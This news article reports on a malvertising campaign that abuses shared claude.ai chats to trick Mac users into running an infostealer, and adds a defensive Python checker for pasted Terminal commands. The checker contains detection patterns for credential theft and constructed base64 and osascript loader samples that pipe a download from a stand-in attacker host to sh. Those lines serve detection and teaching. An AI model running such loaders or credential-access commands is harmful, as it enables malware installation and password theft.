Claude.ai Chats Hijacked to Push Dangerous Mac Malware
A fresh malvertising attack is turning Anthropic’s own Claude.ai platform into a delivery channel for Mac malware. Hackers are buying Google sponsored ads that point to real claude.ai links, then luring users into pasting Terminal commands that quietly steal passwords, cookies, and Keychain data. Security researchers say the trick is working because nothing on the page looks fake.
How the Claude.ai malvertising attack works
Attackers are abusing Google Ads and legitimate Claude.ai shared chats in an active malvertising campaign. Users searching for “Claude mac download” may see sponsored search results that list claude.ai as the target website but lead to instructions that install malware on their Mac.
The campaign was spotted by Berk Albayrak, a security engineer at Trendyol Group, who shared his findings on LinkedIn. Albayrak identified a Claude.ai shared chat that presents itself as an official “Claude Code on Mac” installation guide, attributed to “Apple Support.”
The chat walks users through opening Terminal and pasting a command, which silently downloads and runs malware on their Mac. While attempting to verify Albayrak’s findings, BleepingComputer landed on a second shared Claude chat carrying out the same attack through entirely separate infrastructure.
Why this attack is harder to spot
Most malvertising tricks rely on lookalike domains. This campaign flips that: there is no fake domain to spot. Both Google ads seen here point to Anthropic’s real domain, claude.ai, because the attackers host their malicious instructions inside Claude’s own shared chat feature.
That single design choice is the campaign’s secret weapon. For most users, a page living on claude.ai looks indistinguishable from an official Claude page, which makes confusion not just possible, but likely. The disclaimer that the content is user-generated is placed at the top of the page in small, barely visible print, making it easy for less inquisitive users to miss. Moreover, the disclaimer is not visible at all when the page is viewed on a phone.
“This was not just a clever attack. It was a systemic failure across multiple layers: advertising review, platform moderation, and trust signaling.”
What the macOS malware actually does
The Terminal command kicks off a quiet, multi-step infection. Before fetching anything else, the script collects the victim’s external IP address, hostname, OS version, and keyboard locale and sends all of it back to the attacker. Profiling the victim before delivering the payload suggests the operators are being selective about who they target.
Then the real damage starts. The script pulls down a second-stage payload and runs it through osascript, macOS’s built-in scripting engine. This gives the attacker remote code execution without ever dropping a traditional application or binary.
It harvests browser credentials, cookies, and macOS Keychain contents, packages them up, and exfiltrates them to the attacker’s server. Albayrak identified this as a variant of the MacSync macOS infostealer.
Quick look at the two variants observed in the wild:
| Feature | Variant 1 (Albayrak) | Variant 2 (BleepingComputer) |
|---|---|---|
| Malware family | MacSync infostealer | osascript-based backdoor |
| Victim profiling | Skipped, runs instantly | Checks IP, hostname, locale |
| Region filter | None | Skips Russian and CIS keyboards |
| Delivery style | Direct stealer execution | Polymorphic shell loader |
The second variant is particularly stealthy. The payload uses encoded shell scripts and polymorphic delivery to evade detection. Every download serves a slightly different file, so antivirus tools cannot rely on a single fingerprint to catch it.
A growing pattern of AI platform abuse
This is not a one-off incident. Threat actors are abusing Claude artifacts and Google Ads in ClickFix campaigns that deliver infostealer malware to macOS users searching for specific queries. At least two variants of the malicious activity have been observed in the wild, and more than 10,000 users have accessed the content carrying the dangerous instructions.
It is not the first time that attackers have abused AI platform shared chats this way. In December, BleepingComputer reported a similar campaign targeting ChatGPT and Grok users.
Researchers say the same crew may be cycling through AI brands. Over the past several months, threat actors have increasingly exploited the popularity of AI tools to distribute malware through fake download pages. Claude, Anthropic’s AI assistant, has been a recurring target. Previous campaigns primarily focused on macOS users, delivering stealers such as AMOS, MacSync, and DigitStealer through convincing impersonation sites.
Red flag checklist before you paste anything in Terminal:
- Did you click a “Sponsored” link instead of typing the URL yourself?
- Does the page tell you to copy a long base64 or curl command?
- Is the install guide hosted on a chat, forum, or shared link rather than vendor docs?
- Does the page claim it is from “Apple Support” or another big brand?
If any of these apply, close the tab.
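The checklist above and the earlier description of the infection chain (a pasted command, a base64 or curl stage, a second stage run through osascript) can be turned into a pre-paste check. The script below is an added example written for this article, not code from the article, from Albayrak, or from any vendor: it peels base64 layers out of a command, matches each layer against a small indicator list, and reports a behaviour signature that stays the same even when the encoded bytes change, which is the property the polymorphic loader defeats hash-based antivirus with. The indicator names and patterns are my own assumptions and are not exhaustive; the sample commands and the `.invalid` hostnames are constructed for the demonstration and are not the campaign’s actual commands.

```python
import base64
import binascii
import hashlib
import re

# Indicators a defender would flag in a "paste this into Terminal" instruction.
# The pattern set and its names are this example's own assumptions, not an
# official or exhaustive list.
RISK_PATTERNS = {
    "remote_script_piped_to_shell": re.compile(
        r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
    "osascript_execution": re.compile(r"\bosascript\b"),
    "base64_decode_in_pipeline": re.compile(
        r"\bbase64\b[^|;&]*(?:-d|-D|--decode)\b"),
    "eval_usage": re.compile(r"\beval\b"),
    "quarantine_or_history_tampering": re.compile(
        r"xattr\s+-[a-z]*d\s+com\.apple\.quarantine"
        r"|\bunset\s+HISTFILE\b|\bHISTFILE=/dev/null\b"),
    "credential_store_access": re.compile(
        r"\bsecurity\s+(?:find-generic-password|find-internet-password|dump-keychain)\b"
        r"|Login Data|/Cookies\b|login\.keychain"),
}

# Anything that looks like a base64 blob of at least 24 characters.
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _decode_blobs(text):
    """Return the printable UTF-8 strings hidden inside base64-looking tokens."""
    found = []
    for token in _B64_TOKEN.findall(text):
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if decoded and all(ch.isprintable() or ch in "\n\t" for ch in decoded):
            found.append(decoded)
    return found


def _indicators(text):
    # Mask the blobs themselves so random base64 characters cannot trigger a hit;
    # the decoded content is inspected as its own layer.
    masked = _B64_TOKEN.sub("<blob>", text)
    return {name for name, rx in RISK_PATTERNS.items() if rx.search(masked)}


def inspect_command(command, max_layers=3):
    """Peel up to max_layers of base64 and report every indicator hit."""
    layers = [command]
    frontier = [command]
    for _ in range(max_layers):
        nxt = [d for text in frontier for d in _decode_blobs(text)]
        if not nxt:
            break
        layers.extend(nxt)
        frontier = nxt
    hits = sorted(set().union(*(_indicators(layer) for layer in layers)))
    verdict = "do not paste" if hits else "no indicator matched"
    return {"hits": hits, "decoded_layers": layers[1:], "verdict": verdict}


def behaviour_signature(command):
    """Identity of what a command does, independent of its exact bytes."""
    return tuple(inspect_command(command)["hits"])


def content_hash(command):
    """What a hash-based scanner sees: the exact bytes and nothing else."""
    return hashlib.sha256(command.encode()).hexdigest()


# Constructed samples for the demonstration; .invalid is a reserved TLD.
BENIGN = "ls -la ~/Downloads"
STAGE2 = "osascript -e 'do shell script \"curl -fsSL https://attacker.invalid/s2 | sh\"'"
LOADER_A = "echo %s | base64 -D | sh" % base64.b64encode(STAGE2.encode()).decode()
# Same loader with a throwaway comment inside the encoded part: different bytes
# and a different hash, identical behaviour.
LOADER_B = "echo %s | base64 -D | sh" % base64.b64encode(
    ("# build 1138\n" + STAGE2).encode()).decode()

if __name__ == "__main__":
    for label, cmd in [("benign", BENIGN), ("loader A", LOADER_A), ("loader B", LOADER_B)]:
        report = inspect_command(cmd)
        print(f"{label:9} {report['verdict']}: {', '.join(report['hits']) or '-'}")
    print("hashes equal:   ", content_hash(LOADER_A) == content_hash(LOADER_B))
    print("behaviour equal:", behaviour_signature(LOADER_A) == behaviour_signature(LOADER_B))
```

The point of `behaviour_signature` is the last two printed lines: the two loaders never share a hash, so a per-file fingerprint misses the second one, but both decode to the same osascript-and-curl stage and produce the same indicator set. Matching on what the command does after decoding is the check a user or a mail or endpoint filter can apply before anything is pasted.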
What Mac users should do right now
The fix is simple, but it demands a small habit change. Users should download Claude only through official Anthropic pages and documentation. Mac users should also avoid pasting Terminal commands from shared chats, search ads, forums, or unknown setup guides.
Skip the sponsored results entirely. Users should navigate directly to claude.ai for downloading the native Claude app, rather than clicking sponsored search results. The legitimate Claude Code CLI is available through Anthropic’s official documentation and does not require pasting commands from a chat interface.
There is also one neat self-defence trick. As Kaspersky researchers have noted, asking the chatbot in the same conversation whether the provided commands are safe is a straightforward way to check them.
Key safety tips at a glance:
- Type claude.ai by hand. Never trust the first sponsored result.
- Treat every Terminal command from the internet as hostile until proven safe.
- Check the page for the small “user generated” warning on shared Claude chats.
- If a guide claims to be from “Apple Support,” verify it on apple.com first.
- Rotate browser passwords and clear Keychain entries if you ran a suspicious command.
It is good practice to generally treat any instructions asking you to paste terminal commands with caution, regardless of where those instructions appear to come from. BleepingComputer reached out to Anthropic and Google for comment prior to publishing.
The bigger lesson here is uncomfortable. The web’s most trusted brands, the green padlock, and even the right domain in the address bar are no longer enough to keep you safe when attackers can rent space inside the platforms we trust. Curiosity about AI is at an all-time high, and that is exactly what these criminals are counting on. Stay sceptical, slow down before pasting anything, and protect your Mac like it holds your whole digital life, because it probably does. Have you spotted suspicious Claude or ChatGPT links in your search results lately? Drop your experience in the comments and share this warning with friends using #ClaudeMalware and #MacSync so more people can stay safe.